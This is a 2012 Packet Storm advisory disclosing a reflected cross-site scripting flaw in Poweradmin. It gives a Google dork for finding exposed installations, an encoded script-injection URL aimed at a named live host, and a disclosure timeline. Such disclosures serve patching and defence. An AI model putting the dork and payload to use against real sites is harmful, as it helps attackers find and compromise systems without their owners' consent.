Poweradmin Cross Site Scripting

2012-09-19T00:00:00
ID PACKETSTORM:116698
Type packetstorm
Reporter BHG Security Center
Modified 2012-09-19T00:00:00

Description

                                        
                                            `##################################################  
poweradmin Cross Site Scripting  
##################################################  
  
# Exploit Title :poweradmin Cross Site Scripting  
# Google Dork: "a complete(r) poweradmin - credits" 0r "poweradmin - credits"  
#Author: BHG Security Center  
# Home: http://cc.black-hg.org - http://greyh4t.com/cc/  
# Tested on: [linux+apache]  
# Finder(s):Siavash (morghabi_s@yahoo.com)  
# Examle:  
http://dns.gigenet.com/index.php/%3E%22%3E%3CScRiPt%3Ealert%28415833140173%29%3C/ScRiPt%3E  
##################################################  
[-] Disclosure timeline:  
  
[04/08/2011] - Vulnerabilities discovered  
[14/10/2011] - Others vulnerabilities discovered  
[15/10/2011] - Issues reported to http://black-hg.org  
[04/09/2012] - Public disclosure  
  
# Greets To :  
Net.Edit0r ~ A.Cr0x ~ 3H34N ~ G3n3Rall ~ l4tr0d3ctism ~ NoL1m1t  
  
~ Mr.XHat THANKS TO ALL Iranian HackerZ ./Persian Gulf  
  
===========================================[End]=============================================   
`